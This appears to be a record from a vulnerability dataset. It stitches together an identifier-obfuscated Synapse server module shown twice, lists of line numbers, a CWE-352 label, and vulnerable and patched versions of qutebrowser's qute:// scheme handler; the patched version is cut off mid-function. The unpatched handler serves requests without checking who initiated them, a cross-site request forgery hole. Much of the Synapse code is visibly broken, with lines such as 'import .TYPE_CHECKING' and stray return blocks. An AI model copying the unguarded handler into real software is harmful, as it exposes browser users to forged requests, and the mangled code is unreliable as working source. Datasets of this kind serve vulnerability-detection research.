def FUNC_34(self) -> MacaroonGenerator:
return MacaroonGenerator(self)
@FUNC_0
def FUNC_35(self):
if self.config.worker_app:
return DeviceWorkerHandler(self)
else:
return DeviceHandler(self)
@FUNC_0
def FUNC_36(self) -> DeviceMessageHandler:
return DeviceMessageHandler(self)
@FUNC_0
def FUNC_37(self) -> DirectoryHandler:
return DirectoryHandler(self)
@FUNC_0
def FUNC_38(self) -> E2eKeysHandler:
return E2eKeysHandler(self)
@FUNC_0
def FUNC_39(self) -> E2eRoomKeysHandler:
return E2eRoomKeysHandler(self)
@FUNC_0
def FUNC_40(self) -> AcmeHandler:
return AcmeHandler(self)
@FUNC_0
def FUNC_41(self) -> AdminHandler:
return AdminHandler(self)
@FUNC_0
def FUNC_42(self) -> ApplicationServiceApi:
return ApplicationServiceApi(self)
@FUNC_0
def FUNC_43(self) -> ApplicationServiceScheduler:
return ApplicationServiceScheduler(self)
@FUNC_0
def FUNC_44(self) -> ApplicationServicesHandler:
return ApplicationServicesHandler(self)
@FUNC_0
def FUNC_45(self) -> EventHandler:
return EventHandler(self)
@FUNC_0
def FUNC_46(self) -> EventStreamHandler:
return EventStreamHandler(self)
@FUNC_0
def FUNC_47(self) -> FederationHandler:
return FederationHandler(self)
@FUNC_0
def FUNC_48(self) -> IdentityHandler:
return IdentityHandler(self)
@FUNC_0
def FUNC_49(self) -> InitialSyncHandler:
return InitialSyncHandler(self)
@FUNC_0
def FUNC_50(self):
return ProfileHandler(self)
@FUNC_0
def FUNC_51(self) -> EventCreationHandler:
return EventCreationHandler(self)
@FUNC_0
def FUNC_52(self) -> DeactivateAccountHandler:
return DeactivateAccountHandler(self)
@FUNC_0
def FUNC_53(self) -> SearchHandler:
return SearchHandler(self)
@FUNC_0
def FUNC_54(self) -> SetPasswordHandler:
return SetPasswordHandler(self)
@FUNC_0
def FUNC_55(self) -> EventSources:
return EventSources(self)
@FUNC_0
def FUNC_56(self) -> Keyring:
return Keyring(self)
@FUNC_0
def FUNC_57(self) -> EventBuilderFactory:
return EventBuilderFactory(self)
@FUNC_0
def FUNC_58(self) -> Filtering:
return Filtering(self)
@FUNC_0
def FUNC_59(self) -> PusherPool:
return PusherPool(self)
@FUNC_0
def FUNC_60(self) -> MatrixFederationHttpClient:
VAR_17 = context_factory.FederationPolicyForHTTPS(
self.config
)
return MatrixFederationHttpClient(self, VAR_17)
@FUNC_0
def FUNC_61(self) -> MediaRepositoryResource:
return MediaRepositoryResource(self)
@FUNC_0
def FUNC_62(self) -> MediaRepository:
return MediaRepository(self)
@FUNC_0
def FUNC_63(self) -> TransportLayerClient:
return TransportLayerClient(self)
@FUNC_0
def FUNC_64(self):
if self.should_send_federation():
return FederationSender(self)
elif not self.config.worker_app:
return FederationRemoteSendQueue(self)
else:
raise Exception("Workers cannot send federation traffic")
@FUNC_0
def FUNC_65(self) -> ReceiptsHandler:
return ReceiptsHandler(self)
@FUNC_0
def FUNC_66(self) -> ReadMarkerHandler:
return ReadMarkerHandler(self)
@FUNC_0
def FUNC_67(self) -> ReplicationCommandHandler:
return ReplicationCommandHandler(self)
@FUNC_0
def FUNC_68(self) -> ActionGenerator:
return ActionGenerator(self)
@FUNC_0
def FUNC_69(self) -> UserDirectoryHandler:
return UserDirectoryHandler(self)
@FUNC_0
def FUNC_70(self):
if self.config.worker_app:
return GroupsLocalWorkerHandler(self)
else:
return GroupsLocalHandler(self)
@FUNC_0
def FUNC_71(self):
if self.config.worker_app:
return GroupsServerWorkerHandler(self)
else:
return GroupsServerHandler(self)
@FUNC_0
def FUNC_72(self) -> GroupAttestationSigning:
return GroupAttestationSigning(self)
@FUNC_0
def FUNC_73(self) -> GroupAttestionRenewer:
return GroupAttestionRenewer(self)
@FUNC_0
def FUNC_74(self) -> Secrets:
return Secrets()
@FUNC_0
def FUNC_75(self) -> StatsHandler:
return StatsHandler(self)
@FUNC_0
def FUNC_76(self):
return SpamChecker(self)
@FUNC_0
def FUNC_77(self) -> ThirdPartyEventRules:
return ThirdPartyEventRules(self)
@FUNC_0
def FUNC_78(self):
if self.config.worker_app:
return RoomMemberWorkerHandler(self)
return RoomMemberMasterHandler(self)
@FUNC_0
def FUNC_79(self) -> FederationHandlerRegistry:
return FederationHandlerRegistry(self)
@FUNC_0
def FUNC_80(self):
if self.config.worker_app:
raise Exception("Workers cannot send server notices")
return ServerNoticesManager(self)
@FUNC_0
def FUNC_81(self):
if self.config.worker_app:
return WorkerServerNoticesSender(self)
return ServerNoticesSender(self)
@FUNC_0
def FUNC_82(self) -> MessageHandler:
return MessageHandler(self)
@FUNC_0
def FUNC_83(self) -> PaginationHandler:
return PaginationHandler(self)
@FUNC_0
def FUNC_84(self) -> RoomContextHandler:
return RoomContextHandler(self)
@FUNC_0
def FUNC_85(self) -> RegistrationHandler:
return RegistrationHandler(self)
@FUNC_0
def FUNC_86(self) -> AccountValidityHandler:
return AccountValidityHandler(self)
@FUNC_0
def FUNC_87(self) -> CasHandler:
return CasHandler(self)
@FUNC_0
def FUNC_88(self) -> "SamlHandler":
from synapse.handlers.saml_handler import SamlHandler
return SamlHandler(self)
@FUNC_0
def FUNC_89(self) -> "OidcHandler":
from synapse.handlers.oidc_handler import OidcHandler
return OidcHandler(self)
@FUNC_0
def FUNC_90(self) -> EventClientSerializer:
return EventClientSerializer(self)
@FUNC_0
def FUNC_91(self) -> PasswordPolicyHandler:
return PasswordPolicyHandler(self)
@FUNC_0
def FUNC_92(self) -> Storage:
return Storage(self, self.get_datastores())
@FUNC_0
def FUNC_93(self) -> ReplicationStreamer:
return ReplicationStreamer(self)
@FUNC_0
def FUNC_94(self) -> ReplicationDataHandler:
return ReplicationDataHandler(self)
@FUNC_0
def FUNC_95(self) -> Dict[str, Stream]:
return {stream.NAME: stream(self) for stream in STREAMS_MAP.values()}
@FUNC_0
def FUNC_96(self) -> FederationRateLimiter:
return FederationRateLimiter(self.get_clock(), VAR_8=self.config.rc_federation)
@FUNC_0
def FUNC_97(self) -> ModuleApi:
return ModuleApi(self, self.get_auth_handler())
async def FUNC_98(self, VAR_14: str, VAR_15: str, VAR_16: str):
return await self.get_pusherpool().remove_pusher(VAR_14, VAR_15, VAR_16)
return self.config.send_federation and (
not self.config.worker_app
or self.config.worker_app == "synapse.app.federation_sender"
)
|
import abc
import functools
import logging
import os
from typing import .TYPE_CHECKING, Any, Callable, Dict, List, Optional, TypeVar, cast
import twisted.internet.base
import twisted.internet.tcp
from twisted.mail.smtp import sendmail
from twisted.web.iweb import IPolicyForHTTPS
from synapse.api.auth import Auth
from synapse.api.filtering import Filtering
from synapse.api.ratelimiting import Ratelimiter
from synapse.appservice.api import ApplicationServiceApi
from synapse.appservice.scheduler import ApplicationServiceScheduler
from synapse.config.homeserver import .HomeServerConfig
from synapse.crypto import context_factory
from synapse.crypto.context_factory import RegularPolicyForHTTPS
from synapse.crypto.keyring import Keyring
from synapse.events.builder import EventBuilderFactory
from synapse.events.spamcheck import SpamChecker
from synapse.events.third_party_rules import .ThirdPartyEventRules
from synapse.events.utils import EventClientSerializer
from synapse.federation.federation_client import FederationClient
from synapse.federation.federation_server import (
FederationHandlerRegistry,
FederationServer,
)
from synapse.federation.send_queue import FederationRemoteSendQueue
from synapse.federation.sender import FederationSender
from synapse.federation.transport.client import .TransportLayerClient
from synapse.groups.attestations import GroupAttestationSigning, GroupAttestionRenewer
from synapse.groups.groups_server import GroupsServerHandler, GroupsServerWorkerHandler
from synapse.handlers.account_validity import AccountValidityHandler
from synapse.handlers.acme import AcmeHandler
from synapse.handlers.admin import AdminHandler
from synapse.handlers.appservice import ApplicationServicesHandler
from synapse.handlers.auth import AuthHandler, MacaroonGenerator
from synapse.handlers.cas_handler import CasHandler
from synapse.handlers.deactivate_account import DeactivateAccountHandler
from synapse.handlers.device import DeviceHandler, DeviceWorkerHandler
from synapse.handlers.devicemessage import DeviceMessageHandler
from synapse.handlers.directory import DirectoryHandler
from synapse.handlers.e2e_keys import E2eKeysHandler
from synapse.handlers.e2e_room_keys import E2eRoomKeysHandler
from synapse.handlers.events import EventHandler, EventStreamHandler
from synapse.handlers.federation import FederationHandler
from synapse.handlers.groups_local import GroupsLocalHandler, GroupsLocalWorkerHandler
from synapse.handlers.identity import IdentityHandler
from synapse.handlers.initial_sync import InitialSyncHandler
from synapse.handlers.message import EventCreationHandler, MessageHandler
from synapse.handlers.pagination import PaginationHandler
from synapse.handlers.password_policy import PasswordPolicyHandler
from synapse.handlers.presence import PresenceHandler
from synapse.handlers.profile import ProfileHandler
from synapse.handlers.read_marker import ReadMarkerHandler
from synapse.handlers.receipts import ReceiptsHandler
from synapse.handlers.register import RegistrationHandler
from synapse.handlers.room import (
RoomContextHandler,
RoomCreationHandler,
RoomShutdownHandler,
)
from synapse.handlers.room_list import RoomListHandler
from synapse.handlers.room_member import RoomMemberMasterHandler
from synapse.handlers.room_member_worker import RoomMemberWorkerHandler
from synapse.handlers.search import SearchHandler
from synapse.handlers.set_password import SetPasswordHandler
from synapse.handlers.sso import SsoHandler
from synapse.handlers.stats import StatsHandler
from synapse.handlers.sync import SyncHandler
from synapse.handlers.typing import FollowerTypingHandler, TypingWriterHandler
from synapse.handlers.user_directory import UserDirectoryHandler
from synapse.http.client import InsecureInterceptableContextFactory, SimpleHttpClient
from synapse.http.matrixfederationclient import MatrixFederationHttpClient
from synapse.module_api import ModuleApi
from synapse.notifier import Notifier
from synapse.push.action_generator import ActionGenerator
from synapse.push.pusherpool import PusherPool
from synapse.replication.tcp.client import ReplicationDataHandler
from synapse.replication.tcp.handler import ReplicationCommandHandler
from synapse.replication.tcp.resource import ReplicationStreamer
from synapse.replication.tcp.streams import STREAMS_MAP, Stream
from synapse.rest.media.v1.media_repository import (
MediaRepository,
MediaRepositoryResource,
)
from synapse.secrets import Secrets
from synapse.server_notices.server_notices_manager import ServerNoticesManager
from synapse.server_notices.server_notices_sender import ServerNoticesSender
from synapse.server_notices.worker_server_notices_sender import (
WorkerServerNoticesSender,
)
from synapse.state import StateHandler, StateResolutionHandler
from synapse.storage import Databases, DataStore, Storage
from synapse.streams.events import EventSources
from synapse.types import DomainSpecificString
from synapse.util import Clock
from synapse.util.distributor import Distributor
from synapse.util.ratelimitutils import FederationRateLimiter
from synapse.util.stringutils import random_string
VAR_0 = logging.getLogger(__name__)
if TYPE_CHECKING:
from synapse.handlers.oidc_handler import OidcHandler
from synapse.handlers.saml_handler import SamlHandler
VAR_1 = TypeVar("T", bound=Callable[..., Any])
def FUNC_0(VAR_2: VAR_1) -> T:
if not VAR_2.__name__.startswith("get_"):
raise Exception(
"@FUNC_0 can only be used on functions starting with `get_`"
)
VAR_3 = VAR_2.__name__[len("get") :]
VAR_4 = [False]
@functools.wraps(VAR_2)
def FUNC_1(self):
try:
return getattr(self, VAR_3)
except AttributeError:
pass
if VAR_4[0]:
raise ValueError("Cyclic dependency while VAR_4 %s" % (VAR_3,))
VAR_4[0] = True
try:
VAR_18 = VAR_2(self)
setattr(self, VAR_3, VAR_18)
finally:
VAR_4[0] = False
return VAR_18
return cast(VAR_1, FUNC_1)
class CLASS_0(metaclass=abc.ABCMeta):
VAR_5 = [
"account_validity",
"auth",
"deactivate_account",
"message",
"pagination",
"profile",
"stats",
]
VAR_6 = abc.abstractproperty()
def __init__(
self,
VAR_7: str,
VAR_8: HomeServerConfig,
VAR_9=None,
VAR_10="Synapse",
):
if not VAR_9:
from twisted.internet import .reactor as _reactor
VAR_9 = _reactor
self._reactor = VAR_9
self.hostname = VAR_7
self.signing_key = VAR_8.key.signing_key[0]
self.config = VAR_8
self._listening_services = [] # type: List[twisted.internet.tcp.Port]
self.start_time = None # type: Optional[int]
self._instance_id = random_string(5)
self._instance_name = VAR_8.worker_name or "master"
self.version_string = VAR_10
self.datastores = None # type: Optional[Databases]
def FUNC_2(self) -> str:
return self._instance_id
def FUNC_3(self) -> str:
return self._instance_name
def FUNC_4(self) -> None:
VAR_0.info("Setting up.")
self.start_time = int(self.get_clock().time())
self.datastores = Databases(self.DATASTORE_CLASS, self)
VAR_0.info("Finished setting up.")
if self.config.run_background_tasks:
self.setup_background_tasks()
def FUNC_5(self) -> None:
for i in self.REQUIRED_ON_BACKGROUND_TASK_STARTUP:
getattr(self, "get_" + i + "_handler")()
def FUNC_6(self) -> twisted.internet.base.ReactorBase:
return self._reactor
def FUNC_7(self, VAR_11) -> str:
return VAR_11.getClientIP()
def FUNC_8(self, VAR_12: DomainSpecificString) -> bool:
return VAR_12.domain == self.hostname
def FUNC_9(self, VAR_13: str) -> bool:
return VAR_13.split(":", 1)[1] == self.hostname
@FUNC_0
def FUNC_10(self) -> Clock:
return Clock(self._reactor)
def FUNC_11(self) -> DataStore:
if not self.datastores:
raise Exception("HomeServer.setup must be called before getting datastores")
return self.datastores.main
def FUNC_12(self) -> Databases:
if not self.datastores:
raise Exception("HomeServer.setup must be called before getting datastores")
return self.datastores
def FUNC_13(self) -> HomeServerConfig:
return self.config
@FUNC_0
def FUNC_14(self) -> Distributor:
return Distributor()
@FUNC_0
def FUNC_15(self) -> Ratelimiter:
return Ratelimiter(
clock=self.get_clock(),
rate_hz=self.config.rc_registration.per_second,
burst_count=self.config.rc_registration.burst_count,
)
@FUNC_0
def FUNC_16(self) -> FederationClient:
return FederationClient(self)
@FUNC_0
def FUNC_17(self) -> FederationServer:
return FederationServer(self)
@FUNC_0
def FUNC_18(self) -> Notifier:
return Notifier(self)
@FUNC_0
def FUNC_19(self) -> Auth:
return Auth(self)
@FUNC_0
def FUNC_20(self) -> IPolicyForHTTPS:
return (
InsecureInterceptableContextFactory()
if self.config.use_insecure_ssl_client_just_for_testing_do_not_use
else RegularPolicyForHTTPS()
)
@FUNC_0
def FUNC_21(self) -> SimpleHttpClient:
return SimpleHttpClient(self)
@FUNC_0
def FUNC_22(self) -> SimpleHttpClient:
return SimpleHttpClient(
self,
http_proxy=os.getenvb(b"http_proxy"),
https_proxy=os.getenvb(b"HTTPS_PROXY"),
)
@FUNC_0
def FUNC_23(self) -> SimpleHttpClient:
return SimpleHttpClient(
self,
ip_blacklist=self.config.ip_range_blacklist,
http_proxy=os.getenvb(b"http_proxy"),
https_proxy=os.getenvb(b"HTTPS_PROXY"),
)
@FUNC_0
def FUNC_24(self) -> MatrixFederationHttpClient:
VAR_17 = context_factory.FederationPolicyForHTTPS(
self.config
)
return MatrixFederationHttpClient(self, VAR_17)
@FUNC_0
def FUNC_25(self) -> RoomCreationHandler:
return RoomCreationHandler(self)
@FUNC_0
def FUNC_26(self) -> RoomShutdownHandler:
return RoomShutdownHandler(self)
@FUNC_0
def FUNC_27(self) -> sendmail:
return sendmail
@FUNC_0
def FUNC_28(self) -> StateHandler:
return StateHandler(self)
@FUNC_0
def FUNC_29(self) -> StateResolutionHandler:
return StateResolutionHandler(self)
@FUNC_0
def FUNC_30(self) -> PresenceHandler:
return PresenceHandler(self)
@FUNC_0
def FUNC_31(self):
if self.config.worker.writers.typing == self.get_instance_name():
return TypingWriterHandler(self)
else:
return FollowerTypingHandler(self)
@FUNC_0
def FUNC_32(self) -> SsoHandler:
return SsoHandler(self)
@FUNC_0
def FUNC_33(self) -> SyncHandler:
return SyncHandler(self)
@FUNC_0
def FUNC_34(self) -> RoomListHandler:
return RoomListHandler(self)
@FUNC_0
def FUNC_35(self) -> AuthHandler:
return AuthHandler(self)
@FUNC_0
def FUNC_36(self) -> MacaroonGenerator:
return MacaroonGenerator(self)
@FUNC_0
def FUNC_37(self):
if self.config.worker_app:
return DeviceWorkerHandler(self)
else:
return DeviceHandler(self)
@FUNC_0
def FUNC_38(self) -> DeviceMessageHandler:
return DeviceMessageHandler(self)
@FUNC_0
def FUNC_39(self) -> DirectoryHandler:
return DirectoryHandler(self)
@FUNC_0
def FUNC_40(self) -> E2eKeysHandler:
return E2eKeysHandler(self)
@FUNC_0
def FUNC_41(self) -> E2eRoomKeysHandler:
return E2eRoomKeysHandler(self)
@FUNC_0
def FUNC_42(self) -> AcmeHandler:
return AcmeHandler(self)
@FUNC_0
def FUNC_43(self) -> AdminHandler:
return AdminHandler(self)
@FUNC_0
def FUNC_44(self) -> ApplicationServiceApi:
return ApplicationServiceApi(self)
@FUNC_0
def FUNC_45(self) -> ApplicationServiceScheduler:
return ApplicationServiceScheduler(self)
@FUNC_0
def FUNC_46(self) -> ApplicationServicesHandler:
return ApplicationServicesHandler(self)
@FUNC_0
def FUNC_47(self) -> EventHandler:
return EventHandler(self)
@FUNC_0
def FUNC_48(self) -> EventStreamHandler:
return EventStreamHandler(self)
@FUNC_0
def FUNC_49(self) -> FederationHandler:
return FederationHandler(self)
@FUNC_0
def FUNC_50(self) -> IdentityHandler:
return IdentityHandler(self)
@FUNC_0
def FUNC_51(self) -> InitialSyncHandler:
return InitialSyncHandler(self)
@FUNC_0
def FUNC_52(self):
return ProfileHandler(self)
@FUNC_0
def FUNC_53(self) -> EventCreationHandler:
return EventCreationHandler(self)
@FUNC_0
def FUNC_54(self) -> DeactivateAccountHandler:
return DeactivateAccountHandler(self)
@FUNC_0
def FUNC_55(self) -> SearchHandler:
return SearchHandler(self)
@FUNC_0
def FUNC_56(self) -> SetPasswordHandler:
return SetPasswordHandler(self)
@FUNC_0
def FUNC_57(self) -> EventSources:
return EventSources(self)
@FUNC_0
def FUNC_58(self) -> Keyring:
return Keyring(self)
@FUNC_0
def FUNC_59(self) -> EventBuilderFactory:
return EventBuilderFactory(self)
@FUNC_0
def FUNC_60(self) -> Filtering:
return Filtering(self)
@FUNC_0
def FUNC_61(self) -> PusherPool:
return PusherPool(self)
@FUNC_0
def FUNC_62(self) -> MediaRepositoryResource:
return MediaRepositoryResource(self)
@FUNC_0
def FUNC_63(self) -> MediaRepository:
return MediaRepository(self)
@FUNC_0
def FUNC_64(self) -> TransportLayerClient:
return TransportLayerClient(self)
@FUNC_0
def FUNC_65(self):
if self.should_send_federation():
return FederationSender(self)
elif not self.config.worker_app:
return FederationRemoteSendQueue(self)
else:
raise Exception("Workers cannot send federation traffic")
@FUNC_0
def FUNC_66(self) -> ReceiptsHandler:
return ReceiptsHandler(self)
@FUNC_0
def FUNC_67(self) -> ReadMarkerHandler:
return ReadMarkerHandler(self)
@FUNC_0
def FUNC_68(self) -> ReplicationCommandHandler:
return ReplicationCommandHandler(self)
@FUNC_0
def FUNC_69(self) -> ActionGenerator:
return ActionGenerator(self)
@FUNC_0
def FUNC_70(self) -> UserDirectoryHandler:
return UserDirectoryHandler(self)
@FUNC_0
def FUNC_71(self):
if self.config.worker_app:
return GroupsLocalWorkerHandler(self)
else:
return GroupsLocalHandler(self)
@FUNC_0
def FUNC_72(self):
if self.config.worker_app:
return GroupsServerWorkerHandler(self)
else:
return GroupsServerHandler(self)
@FUNC_0
def FUNC_73(self) -> GroupAttestationSigning:
return GroupAttestationSigning(self)
@FUNC_0
def FUNC_74(self) -> GroupAttestionRenewer:
return GroupAttestionRenewer(self)
@FUNC_0
def FUNC_75(self) -> Secrets:
return Secrets()
@FUNC_0
def FUNC_76(self) -> StatsHandler:
return StatsHandler(self)
@FUNC_0
def FUNC_77(self):
return SpamChecker(self)
@FUNC_0
def FUNC_78(self) -> ThirdPartyEventRules:
return ThirdPartyEventRules(self)
@FUNC_0
def FUNC_79(self):
if self.config.worker_app:
return RoomMemberWorkerHandler(self)
return RoomMemberMasterHandler(self)
@FUNC_0
def FUNC_80(self) -> FederationHandlerRegistry:
return FederationHandlerRegistry(self)
@FUNC_0
def FUNC_81(self):
if self.config.worker_app:
raise Exception("Workers cannot send server notices")
return ServerNoticesManager(self)
@FUNC_0
def FUNC_82(self):
if self.config.worker_app:
return WorkerServerNoticesSender(self)
return ServerNoticesSender(self)
@FUNC_0
def FUNC_83(self) -> MessageHandler:
return MessageHandler(self)
@FUNC_0
def FUNC_84(self) -> PaginationHandler:
return PaginationHandler(self)
@FUNC_0
def FUNC_85(self) -> RoomContextHandler:
return RoomContextHandler(self)
@FUNC_0
def FUNC_86(self) -> RegistrationHandler:
return RegistrationHandler(self)
@FUNC_0
def FUNC_87(self) -> AccountValidityHandler:
return AccountValidityHandler(self)
@FUNC_0
def FUNC_88(self) -> CasHandler:
return CasHandler(self)
@FUNC_0
def FUNC_89(self) -> "SamlHandler":
from synapse.handlers.saml_handler import SamlHandler
return SamlHandler(self)
@FUNC_0
def FUNC_90(self) -> "OidcHandler":
from synapse.handlers.oidc_handler import OidcHandler
return OidcHandler(self)
@FUNC_0
def FUNC_91(self) -> EventClientSerializer:
return EventClientSerializer(self)
@FUNC_0
def FUNC_92(self) -> PasswordPolicyHandler:
return PasswordPolicyHandler(self)
@FUNC_0
def FUNC_93(self) -> Storage:
return Storage(self, self.get_datastores())
@FUNC_0
def FUNC_94(self) -> ReplicationStreamer:
return ReplicationStreamer(self)
@FUNC_0
def FUNC_95(self) -> ReplicationDataHandler:
return ReplicationDataHandler(self)
@FUNC_0
def FUNC_96(self) -> Dict[str, Stream]:
return {stream.NAME: stream(self) for stream in STREAMS_MAP.values()}
@FUNC_0
def FUNC_97(self) -> FederationRateLimiter:
return FederationRateLimiter(self.get_clock(), VAR_8=self.config.rc_federation)
@FUNC_0
def FUNC_98(self) -> ModuleApi:
return ModuleApi(self, self.get_auth_handler())
async def FUNC_99(self, VAR_14: str, VAR_15: str, VAR_16: str):
return await self.get_pusherpool().remove_pusher(VAR_14, VAR_15, VAR_16)
return self.config.send_federation and (
not self.config.worker_app
or self.config.worker_app == "synapse.app.federation_sender"
)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
29,
34,
126,
128,
132,
133,
135,
136,
140,
144,
149,
150,
152,
154,
161,
162,
165,
172,
174,
175,
176,
178,
179,
182,
186,
189,
195,
205,
206,
207,
208,
210,
225,
227,
230,
235,
238,
240,
242,
245,
250,
253,
258,
264,
265,
266,
267,
270,
279,
285,
287,
289,
292,
295,
299,
303,
305,
309,
311,
314,
318,
326,
330,
334,
338,
342,
350,
354,
362,
366,
370,
374,
378,
382,
386,
393,
397,
401,
405,
409,
413,
420,
424,
428,
432,
436,
440,
444,
448,
452,
456,
460,
464,
468,
472,
476,
480,
484,
488,
492,
496,
500,
504,
508,
512,
516,
523,
526,
527,
529,
533,
537,
546,
550,
554,
558,
562,
566,
573,
580,
584,
588,
592,
596,
600,
604,
610,
614,
620,
626,
630,
634,
638,
642,
646,
650,
654,
656,
660,
662,
666,
670,
674,
678,
682,
686,
690,
694,
697,
704,
138,
139,
140,
141,
142,
143,
181,
182,
183,
184,
185,
186,
187,
188,
189,
190,
191,
192,
193,
194,
218,
219,
220,
221,
222,
244,
245,
246,
247,
248,
252,
253,
254,
255,
256,
272,
273,
274,
275,
276,
281,
282,
283,
698,
699
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
29,
34,
126,
128,
132,
133,
135,
136,
140,
144,
149,
150,
152,
154,
161,
162,
165,
172,
174,
175,
176,
178,
179,
182,
186,
189,
195,
205,
206,
207,
208,
210,
225,
227,
230,
235,
238,
240,
242,
245,
250,
253,
258,
264,
265,
266,
267,
270,
279,
285,
287,
289,
292,
295,
299,
303,
305,
309,
311,
314,
318,
326,
330,
334,
338,
342,
350,
357,
368,
381,
391,
395,
399,
403,
407,
411,
415,
422,
426,
430,
434,
438,
442,
449,
453,
457,
461,
465,
469,
473,
477,
481,
485,
489,
493,
497,
501,
505,
509,
513,
517,
521,
525,
529,
533,
537,
541,
545,
548,
549,
551,
555,
559,
568,
572,
576,
580,
584,
588,
595,
602,
606,
610,
614,
618,
622,
626,
632,
636,
642,
648,
652,
656,
660,
664,
668,
672,
676,
678,
682,
684,
688,
692,
696,
700,
704,
708,
712,
716,
719,
726,
138,
139,
140,
141,
142,
143,
181,
182,
183,
184,
185,
186,
187,
188,
189,
190,
191,
192,
193,
194,
218,
219,
220,
221,
222,
244,
245,
246,
247,
248,
252,
253,
254,
255,
256,
272,
273,
274,
275,
276,
281,
282,
283,
353,
354,
355,
360,
361,
362,
371,
372,
373,
374,
384,
385,
386,
720,
721
] |
3CWE-352
| # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2016-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""QtWebEngine specific qute://* handlers and glue code."""
from PyQt5.QtCore import QBuffer, QIODevice
from PyQt5.QtWebEngineCore import (QWebEngineUrlSchemeHandler,
QWebEngineUrlRequestJob)
from qutebrowser.browser import qutescheme
from qutebrowser.utils import log, qtutils
class QuteSchemeHandler(QWebEngineUrlSchemeHandler):
"""Handle qute://* requests on QtWebEngine."""
def install(self, profile):
"""Install the handler for qute:// URLs on the given profile."""
profile.installUrlSchemeHandler(b'qute', self)
if qtutils.version_check('5.11', compiled=False):
# WORKAROUND for https://bugreports.qt.io/browse/QTBUG-63378
profile.installUrlSchemeHandler(b'chrome-error', self)
profile.installUrlSchemeHandler(b'chrome-extension', self)
def requestStarted(self, job):
"""Handle a request for a qute: scheme.
This method must be reimplemented by all custom URL scheme handlers.
The request is asynchronous and does not need to be handled right away.
Args:
job: QWebEngineUrlRequestJob
"""
url = job.requestUrl()
if url.scheme() in ['chrome-error', 'chrome-extension']:
# WORKAROUND for https://bugreports.qt.io/browse/QTBUG-63378
job.fail(QWebEngineUrlRequestJob.UrlInvalid)
return
assert job.requestMethod() == b'GET'
assert url.scheme() == 'qute'
log.misc.debug("Got request for {}".format(url.toDisplayString()))
try:
mimetype, data = qutescheme.data_for_url(url)
except qutescheme.NoHandlerFound:
log.misc.debug("No handler found for {}".format(
url.toDisplayString()))
job.fail(QWebEngineUrlRequestJob.UrlNotFound)
except qutescheme.QuteSchemeOSError:
# FIXME:qtwebengine how do we show a better error here?
log.misc.exception("OSError while handling qute://* URL")
job.fail(QWebEngineUrlRequestJob.UrlNotFound)
except qutescheme.QuteSchemeError:
# FIXME:qtwebengine how do we show a better error here?
log.misc.exception("Error while handling qute://* URL")
job.fail(QWebEngineUrlRequestJob.RequestFailed)
except qutescheme.Redirect as e:
qtutils.ensure_valid(e.url)
job.redirect(e.url)
else:
log.misc.debug("Returning {} data".format(mimetype))
# We can't just use the QBuffer constructor taking a QByteArray,
# because that somehow segfaults...
# https://www.riverbankcomputing.com/pipermail/pyqt/2016-September/038075.html
buf = QBuffer(parent=self)
buf.open(QIODevice.WriteOnly)
buf.write(data)
buf.seek(0)
buf.close()
job.reply(mimetype.encode('ascii'), buf)
| # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2016-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""QtWebEngine specific qute://* handlers and glue code."""
from PyQt5.QtCore import QBuffer, QIODevice
from PyQt5.QtWebEngineCore import (QWebEngineUrlSchemeHandler,
QWebEngineUrlRequestJob)
from qutebrowser.browser import qutescheme
from qutebrowser.utils import log, qtutils
class QuteSchemeHandler(QWebEngineUrlSchemeHandler):
"""Handle qute://* requests on QtWebEngine."""
def install(self, profile):
"""Install the handler for qute:// URLs on the given profile."""
profile.installUrlSchemeHandler(b'qute', self)
if qtutils.version_check('5.11', compiled=False):
# WORKAROUND for https://bugreports.qt.io/browse/QTBUG-63378
profile.installUrlSchemeHandler(b'chrome-error', self)
profile.installUrlSchemeHandler(b'chrome-extension', self)
def requestStarted(self, job):
"""Handle a request for a qute: scheme.
This method must be reimplemented by all custom URL scheme handlers.
The request is asynchronous and does not need to be handled right away.
Args:
job: QWebEngineUrlRequestJob
"""
url = job.requestUrl()
if url.scheme() in ['chrome-error', 'chrome-extension']:
# WORKAROUND for https://bugreports.qt.io/browse/QTBUG-63378
job.fail(QWebEngineUrlRequestJob.UrlInvalid)
return
# Only the browser itself or qute:// pages should access any of those
# URLs.
# The request interceptor further locks down qute://settings/set.
try:
initiator = job.initiator()
except AttributeError:
# Added in Qt 5.11
pass
else:
if initiator.isValid() and initiator.scheme() != 'qute':
log.misc.warning("Blocking malicious request from {} to {}"
.format(initiator.toDisplayString(),
url.toDisplayString()))
job.fail(QWebEngineUrlRequestJob.RequestDenied)
return
if job.requestMethod() != b'GET':
job.fail(QWebEngineUrlRequestJob.RequestDenied)
return
assert url.scheme() == 'qute'
log.misc.debug("Got request for {}".format(url.toDisplayString()))
try:
mimetype, data = qutescheme.data_for_url(url)
except qutescheme.NoHandlerFound:
log.misc.debug("No handler found for {}".format(
url.toDisplayString()))
job.fail(QWebEngineUrlRequestJob.UrlNotFound)
except qutescheme.QuteSchemeOSError:
# FIXME:qtwebengine how do we show a better error here?
log.misc.exception("OSError while handling qute://* URL")
job.fail(QWebEngineUrlRequestJob.UrlNotFound)
except qutescheme.QuteSchemeError:
